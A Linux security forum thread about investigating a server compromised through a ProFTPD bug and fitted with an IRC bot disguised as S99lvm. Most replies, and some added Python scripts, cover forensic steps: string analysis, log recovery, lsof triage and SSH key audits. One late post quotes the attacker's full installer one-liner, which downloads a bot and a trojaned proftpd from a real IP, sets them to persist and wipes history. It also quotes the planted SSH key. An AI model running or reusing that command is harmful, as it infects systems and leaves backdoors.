LinuxQuestions.org
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 11-24-2010, 12:29 PM   #16
pfo
LQ Newbie
 
Registered: Aug 2004
Posts: 12

Original Poster

Quote:
it could indicate root access was easy to gain
Well, no direct root access from ssh, sshd on a different port than the normal one, root pwd different from ssh user, and firewall input/output...

So surely not from kiddies/newbies. But we (one of us is much better than me) are investigating.

The idea behind my post was: has nobody already seen this S99lvm/cpsd ircd bot?
This could have given us much more information...
 
Old 11-24-2010, 12:39 PM   #17
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Quote:
The idea behind my post was: has nobody already seen this S99lvm/cpsd ircd bot?
I did some googling and wasn't able to come up with anything other than the pcsc-lite problem I linked to earlier. It could be that if you ran something like rkhunter, something more meaningful may crop up. Or evidence from your investigation may reveal something. If this thing is more widespread out in the wild, either it hasn't been noticed yet, or it might be under a different name (or I need remedial Google training).

One thing we don't have is a summary of what kinds of services this system ran, and what was exposed to the internets. For example, is this a web server running a bunch of PHP programs? That might help in trying to figure out not only how it got in, but it might give some idea what it is.
 
Old 11-24-2010, 01:09 PM   #18
OlRoy
Member
 
Registered: Dec 2002
Posts: 306

Quote:
Originally Posted by pfo View Post
Well, no direct root access from ssh, sshd on a different port than the normal one, root pwd different from ssh user, and firewall input/output...

So surely not from kiddies/newbies. But we (one of us is much better than me) are investigating.

The idea behind my post was: has nobody already seen this S99lvm/cpsd ircd bot?
This could have given us much more information...
It may or may not be one of the most common IRC bots out there, but no one will know if they've seen it because all they have to go on is a filename. You can name a file anything.

An easy thing you can do to see if anyone has seen it is to run "strings -a <program name> > malware.txt" then google for certain strings of interest that may uniquely identify it. Your luck will vary depending on whether the malware is packed in some way, but you may find anything from other people who have seen it before to actual source code. Then again, you may find nothing.

A lot can be learned from reverse engineering malware, however, determining how you were compromised may be a question that no amount of reverse engineering it can answer.

Update: Forgot to mention that another thing you can do is submit the hash or binary to something like VirusTotal to see if you can find out what various AV software thinks of it.

Last edited by OlRoy; 11-24-2010 at 03:36 PM.
 
Old 11-24-2010, 07:17 PM   #19
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 782
Blog Entries: 8

Another tidbit of info.

The host that's serving IRC content is located in the Dominican Republic. The server shows "irc.foonet.com" when telnet'ing to the IP on port 6667. "irc.foonet.com" is all over the internet (I've no idea if a certain ircd is associated with that specific network...a quick google search didn't show anything).
 
Old 11-24-2010, 07:37 PM   #20
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 782
Blog Entries: 8

OK...kinda weird...I checked the IP's whois info at work today (sometime this morning, eastern time) and it showed that the hosting was in DR. Depending on how I search, I'm getting results of Global IP and DR. I guess it doesn't matter anymore, though. The culprit system is more than likely compromised itself.

Last edited by unixfool; 11-24-2010 at 07:50 PM.
 
Old 11-24-2010, 07:58 PM   #21
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Quote:
Originally Posted by unixfool View Post
(I've no idea if a certain ircd is associated with that specific network...a quick google search didn't show anything).
Not that I know but for instance Unrealircd has "irc.foonet.com" on their example confs. So if people use an example conf but don't change the banner then it might welcome users with something like "welcome to irc.foonet.com" (foonet.com itself being in AS29838 but dnetnoc.net is in AS7819 BTW).

//Meanwhile, and sure he's free to do that, the OP decided to try his luck elsewhere. Maybe we should ask him to invite the more seasoned one on the case to replace him in this discussion. Oh well...

Last edited by unSpawn; 11-24-2010 at 08:01 PM.
 
Old 11-25-2010, 08:37 AM   #22
pfo
LQ Newbie
 
Registered: Aug 2004
Posts: 12

Original Poster
Quote:
Originally Posted by unSpawn View Post
Not that I know but for instance Unrealircd has "irc.foonet.com" on their example confs. So if people use an example conf but don't change the banner then it might welcome users with something like "welcome to irc.foonet.com" (foonet.com itself being in AS29838 but dnetnoc.net is in AS7819 BTW).

//Meanwhile, and sure he's free to do that, the OP decided to try his luck elsewhere. Maybe we should ask him to invite the more seasoned one on the case to replace him in this discussion. Oh well...
The OP has just left a comment there... My English is not so good, so could you please explain to me what this means:
Quote:
Maybe we should ask him to invite the more seasoned one on the case to replace him in this discussion. Oh well..
Is there a problem with the fact that one of us wrote this comment?

Anyway..

As I already said, thanks to everybody for all your answers, comments ,help.

This box is hosting
qmail/courier
httpd
php
sftp
dns

It's not a hosting box (I mean there is no known website/user on it).

It's one of our private boxes.

I've seen that somebody has installed wine + utorrent and used it with a vncserver (from a tunnel)...
I've also seen that proftpd has been used with a user with a very easy password...

We will surely never know how it happened.

But we are working hard to be sure it never happens again.
 
Old 11-25-2010, 10:39 AM   #23
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Quote:
Originally Posted by pfo View Post
We will surely never know how it happened.
But we are working hard to be sure it never happens again.
If you don't investigate then you'll never know.

This thread has given you enough clues so far IMHO. So what is it that keeps you from investigating this properly? Is it a matter of time? Or expertise? Sure we could help, we've got a few people here who deal with breaches of security quite regularly, but you have to feed us more than just snippets. If you don't want to share logs et cetera publicly then by all means feel free to contact me by email.
 
Old 11-25-2010, 11:17 AM   #24
pfo
LQ Newbie
 
Registered: Aug 2004
Posts: 12

Original Poster
Quote:
Originally Posted by unSpawn View Post
If you don't investigate then you'll never know.

This thread has given you enough clues so far IMHO. So what is it that keeps you from investigating this properly? Is it a matter of time? Or expertise? Sure we could help, we've got a few people here who deal with breaches of security quite regularly, but you have to feed us more than just snippets. If you don't want to share logs et cetera publicly then by all means feel free to contact me by email.
We are investigating. But as I already said, all the logs had been deleted..

Also, it's true that I'm not a linux security expert...
 
Old 11-25-2010, 12:51 PM   #25
OlRoy
Member
 
Registered: Dec 2002
Posts: 306

Quote:
Originally Posted by pfo View Post
We are investigating. But as I already said, all the logs had been deleted..

Also, it's true that I'm not a linux security expert...
The logs will still be in unallocated space unless they have been overwritten; either intentionally by wiping them instead of deleting them, or they could have been overwritten accidentally by adding new files like the pirated material. You don't know until you investigate further.

It's been a while since I did it, but I've had logs deleted before, and most of the logs were recovered by:

1. Using blkls from the Sleuth Kit to extract unallocated space from a dd image of the hard drive to unallocated.dd.

2. Running strings on unallocated.dd to save readable strings to unallocated.str.

3. Grepping unallocated.str with a regular expression to extract strings that matched syslog format and saving them as syslog.str.

As unspawn mentioned, there are more logs than those created by syslog. You can also take an educated guess of how it happened by knowing what services/versions were exposed and what known vulnerabilities may exist in that software.

By investigating further, perhaps you will even find your computer is attacking other computers using the same exploit that the attacker used to exploit your computer.

After reinstalling, if you have a NIDS/HIDS monitor your server, and send your logs to a remote syslog server, you will probably find the attacker is trying to exploit the same vulnerability he was successful with the first time, which shows how he got in.

My point is, just because important logs were deleted, it doesn't mean it's game over.

Last edited by OlRoy; 11-25-2010 at 12:52 PM.
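The strings-and-grep steps from OlRoy's posts #18 and #25 (pull readable strings out of a binary or an unallocated-space dump, then keep only the lines that look like syslog records) as a small Python script. This is an added example, not code from the thread; the blkls step that produces unallocated.dd from a disk image is not reproduced, and the sample bytes below are constructed.

```python
import re
import sys

def extract_strings(data: bytes, min_len: int = 4):
    """Stand-in for `strings -a`: runs of at least min_len printable ASCII bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]

# Classic syslog line: "Mon DD HH:MM:SS host tag[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec) [ 0-9]\d "
    r"\d{2}:\d{2}:\d{2} \S+ \S+: "
)

def syslog_lines(strings):
    """Keep only strings that look like syslog records (step 3 of the post)."""
    return [s for s in strings if SYSLOG_RE.match(s)]

def recover_syslog(data: bytes):
    """Steps 2 and 3 together: strings, then the syslog filter."""
    return syslog_lines(extract_strings(data))

# Constructed sample of "unallocated space": deleted log fragments mixed with
# binary junk and one unrelated path. Hostnames and addresses are made up.
SAMPLE = (
    b"\x7fELF\x01\x01\x00\x00"
    b"Nov 24 11:58:13 box proftpd[1877]: USER ftpuser: Login successful.\x00\x00"
    b"\x1b\x9c/etc/rc.d/rc3.d/S99lvm\x00\xfe"
    b"Nov 24 12:03:40 box sshd[2210]: Accepted publickey for root "
    b"from 203.0.113.5 port 51022 ssh2\x00ok\x00"
    b"Nov 24 12:05:02 box kernel: eth0: link up\x00"
)

if __name__ == "__main__":
    # Real use: python3 recover.py unallocated.dd. The file is read whole;
    # for images larger than memory, read in chunks with an overlap.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for line in recover_syslog(blob):
        print(line)
```

The path string survives the strings pass but not the syslog filter, which is exactly the separation step 3 of the post performs.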
 
Old 11-25-2010, 09:41 PM   #26
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: Slackware, Termux
Posts: 787

Code:
S99lvm 4781 root 3u IPv4 7966 TCP my.domain.com:33266->ns10.dnetnoc.net:ircd
root shouldn't ever be making an IRC connection to anywhere, let alone a machine that looks to be a nameserver. You may wish to warn the admin of that machine as well, if you haven't already, as it's likely being used as a C&C.
 
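A small triage script for the kind of lsof -i output jayjwa quotes above: it parses each connection line and flags root-owned processes with an outbound IRC connection, plus commands named like an rc.d start script. This is an added example, not code from the thread; apart from the S99lvm line already quoted in the post, the lsof lines are constructed, and the IRC port set is an assumption (6667, the "ircd" service name lsof prints for it, and 6697 for IRC over TLS).

```python
import re

IRC_PORTS = {"ircd", "6667", "6697"}          # assumption, see lead-in
INIT_SCRIPT_NAME = re.compile(r"^[SK]\d\d")     # S99lvm, K20foo, ...

def parse_lsof_line(line):
    """Return the fields of one established-connection line, else None.

    Layout: COMMAND PID USER FD TYPE DEVICE [SIZE/OFF] NODE NAME [(STATE)].
    Note lsof truncates COMMAND to 9 characters unless +c is used.
    """
    f = line.split()
    if len(f) < 8:
        return None
    name = next((x for x in f[5:] if "->" in x), None)
    if name is None:                    # header, LISTEN sockets, UDP
        return None
    local, remote = name.split("->", 1)
    host, _, port = remote.rpartition(":")
    return {"command": f[0], "pid": int(f[1]), "user": f[2],
            "local": local, "remote_host": host, "remote_port": port}

def suspicious(conn):
    """Reasons a connection deserves a look; empty list means nothing found."""
    reasons = []
    if conn["user"] == "root" and conn["remote_port"] in IRC_PORTS:
        reasons.append("root process holds an outbound IRC connection")
    if INIT_SCRIPT_NAME.match(conn["command"]):
        reasons.append("command named like an rc.d init script")
    return reasons

def triage(lsof_output):
    findings = []
    for line in lsof_output.splitlines():
        conn = parse_lsof_line(line)
        if conn and (reasons := suspicious(conn)):
            findings.append((conn["command"], conn["pid"], conn["user"],
                             conn["remote_host"], conn["remote_port"], reasons))
    return findings

# Constructed sample; only the last line is the one quoted in the thread.
SAMPLE_LSOF = """\
COMMAND  PID USER FD TYPE DEVICE NODE NAME
sshd    1201 root  3u IPv4 4410 TCP *:ssh (LISTEN)
irssi   2001 alice 5u IPv4 9001 TCP my.domain.com:40001->irc.example.net:6667 (ESTABLISHED)
S99lvm  4781 root  3u IPv4 7966 TCP my.domain.com:33266->ns10.dnetnoc.net:ircd
"""

if __name__ == "__main__":
    for cmd, pid, user, host, port, reasons in triage(SAMPLE_LSOF):
        print(f"{cmd}[{pid}] ({user}) -> {host}:{port}: {'; '.join(reasons)}")
```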
Old 11-28-2010, 01:31 PM   #27
ed009
LQ Newbie
 
Registered: Nov 2010
Posts: 1

I've been tracking these guys for a while now.
It's a Dominican guy and most likely a Colombian guy.
They exploit a ProFTPD remote root command execution bug released on Nov 07.
The file in question is a modded version of the kaiten irc bot.
He uses it to connect to that network and through there give commands to a bunch of bots; mostly he uses them to DDoS.
I sniffed some of his actions and IPs. A big part are targeted at Colombian sites and Central American sites.
I also managed to get his command that actually inserts the bot into your machine.

do not execute this:
Code:
unset HISTFILE HISTSAVE;wget 66.128.53.225/pico;chmod +x pico;mv pico /etc/rc.d/rc3.d/S99lvm;/etc/rc.d/rc3.d/S99lvm;chattr +isa /etc/rc.d/rc3.d/S99lvm;history -c; wget 66.128.53.225/proftp;mv proftp /usr/sbin/proftpd;chmod ga+rx /usr/sbin/proftpd;killall -9 proftpd;proftpd
You might want to check your /root/.ssh/authorized_keys for:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA2MHMyWps9N4NuEDvMCuTLLWuzJJ0yLeAruGGKo1TxrbFuDNLMcFr4kGFj8urc3MtMtqbycRn 789u3drVYvdrRjUzEqHPxfae+JkugjmxnvS0hWGLzKrGL2VF3TQ2zo4rmYVe0hJ/UJ3pG6I67nXiDz1l/ajlWmalcpNVIjdTxzqv4HOnTcvdYiAx+YRTaswLN47qohK70jP5DlzC/sjypXqgDPMq1SinHpedMcJSaXjfyhN4pIKnSXXybAdbgPk7ry1hpZkOXbigl5lVFoen/oTm0mebj/k544nETbFSj7SS9wihleLTv404hyVEdynUiaZh5VGHzo0PGldc9KdZtQ== root@bt

He inserts an RSA key to probably have quick access to your box without needing a password or rk.
I'll be back later with more details.

Last edited by ed009; 11-28-2010 at 01:35 PM.
 
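One way to act on ed009's authorized_keys advice without eyeballing base64 is to audit the file against an allowlist of known key fingerprints, the same SHA256 form ssh-keygen -lf prints. This is an added example, not code from the thread; the key blobs in it are constructed (wire-format shaped, not real keys), and the watchlisted comment root@bt is the one ed009 reports on the planted key.

```python
import base64
import hashlib
import struct

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")
WATCH_COMMENTS = {"root@bt"}   # comment on the planted key in this thread

def ssh_fingerprint(blob_b64):
    """SHA256 fingerprint as ssh-keygen -lf prints it (no '=' padding)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """Yield (line_no, keytype, blob, comment); leading options are skipped.

    Options containing quoted spaces are split naively; good enough for an audit
    that only needs the key material itself.
    """
    for n, line in enumerate(text.splitlines(), 1):
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue                       # malformed line, not a usable key
        yield n, tokens[idx], tokens[idx + 1], " ".join(tokens[idx + 2:])

def audit(text, allowed_fingerprints):
    """Return entries that are not on the allowlist or match the watchlist."""
    findings = []
    for n, keytype, blob, comment in parse_authorized_keys(text):
        fp = ssh_fingerprint(blob)
        reasons = []
        if fp not in allowed_fingerprints:
            reasons.append("fingerprint not on allowlist")
        if comment in WATCH_COMMENTS:
            reasons.append("comment matches known-bad key")
        if reasons:
            findings.append((n, keytype, comment, fp, reasons))
    return findings

def _fake_blob(seed):
    """Constructed blob in ssh wire layout (type, e, n); NOT a real key."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    return base64.b64encode(s(b"ssh-rsa") + s(b"\x01\x00\x01") + s(bytes([seed]) * 64)).decode()

GOOD_BLOB, BAD_BLOB = _fake_blob(0x11), _fake_blob(0x22)
ALLOWED = {ssh_fingerprint(GOOD_BLOB)}   # fingerprints you issued yourself
SAMPLE = ("# constructed sample, not a real file\n"
          f"ssh-rsa {GOOD_BLOB} admin@workstation\n"
          f"ssh-rsa {BAD_BLOB} root@bt\n")

if __name__ == "__main__":
    for n, keytype, comment, fp, reasons in audit(SAMPLE, ALLOWED):
        print(f"line {n}: {keytype} {fp} {comment!r}: {', '.join(reasons)}")
```

Run it on /root/.ssh/authorized_keys with ALLOWED populated from the fingerprints you actually issued; anything else listed is a key you did not put there.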
All times are GMT -5.